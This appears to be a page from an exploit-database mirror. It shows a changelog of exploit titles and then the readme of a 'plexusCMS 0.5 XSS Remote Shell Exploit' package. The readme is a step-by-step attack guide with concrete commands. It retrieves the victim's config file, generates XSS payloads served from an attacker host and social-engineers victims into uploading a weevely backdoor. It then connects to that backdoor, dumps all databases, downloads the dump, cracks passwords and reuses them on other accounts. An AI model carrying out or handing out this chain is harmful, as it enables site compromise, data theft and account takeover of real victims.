ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
75 lines
No EOL
2.8 KiB
Text
75 lines
No EOL
2.8 KiB
Text
# Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit
|
|
# Google Dork: allinurl: plx-storage
|
|
# Date: 22.02.2013
|
|
# Exploit Author: neglomaniac
|
|
# Vendor Homepage: http://plexus-cms.org/
|
|
# Version: 0.5
|
|
|
|
---
|
|
|
|
FILES
|
|
|
|
backdoor.php simple commend execute backdoor
|
|
commands.txt list of useful commands for owning remote box
|
|
generator.py create important files with given parameters
|
|
phpinfo.php simple phpinfo call for testing
|
|
plexus05.tgz original plexus source code for auditing
|
|
postit.py send evil POST Request for file upload
|
|
readme.txt nothing else than this file
|
|
request.txt evil POST request template for postit.py
|
|
weevely.php weevely shell with password:secret
|
|
weevely.tgz weevely stealth web backdoor client and generator
|
|
|
|
---
|
|
|
|
EXPLOITATION
|
|
|
|
Get database credentials with wget http://RHOST/plx-file/config.php
|
|
|
|
Try to log in with phpmyadmin and dump the database for password
|
|
cracking. If you can crack the password you can upload php files
|
|
with new image and new file. You can launch your php backdoors
|
|
inside http://plexushost/plx-storage/files/ or plx-storage/images/
|
|
|
|
If you do not have access to the database in some way you can
|
|
upload files with XSS and Social Engineering.
|
|
|
|
Set up a server with php support and python installed on it. Copy
|
|
all this files to a location where you can write to it. Launch
|
|
|
|
python generator.py plexushost 80 http://yourserver/scripts/ weevely.php
|
|
|
|
If you see: plximage.php, plximage.js, plximage.xss generated!!!
|
|
all files are generated for exploitation.
|
|
|
|
plexushost is the victim webserver where plexus is installed
|
|
port is the standard webserver port
|
|
|
|
http://yourserver/scripts/ is the location of exploit files. Do not forget
|
|
the slash at the end!!!
|
|
|
|
weevely.php ist the file uploaded at http://victimhost/plx-storage/files/
|
|
|
|
Get url from plximage.xss obfuscate, iframe and/or shorten it. Put it into
|
|
an email, on a webpage or wherever you want.
|
|
|
|
Socialengineer your victim to open this url. If your victim is logged in
|
|
you get your backdoor at: http://victimhost/plx-storage/files/ Else you
|
|
need to socialengineer your victim to log in. After the victim logs in you
|
|
get your backdoor at files directory.
|
|
|
|
Connect to your backdoor with weevely and password your password (secret)
|
|
python weevely.py http://victimhost/plx-storage/files/yourfile.php secret
|
|
|
|
Dumpt the whole database with previous collected credential and download ist
|
|
mysqldump -f -r plxinfo.txt -uYOURUSER -pYOURPASS --all-databases
|
|
wget http://RHOST/plx-storage/files/plxinfo.txt
|
|
|
|
Crack password and use it for your next hacking attempts against your victim.
|
|
For example try this password for root or other users, other mysql databases,
|
|
mysql root, facebook/twitter accounts and so on.
|
|
|
|
---
|
|
|
|
|
|
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32618.tgz |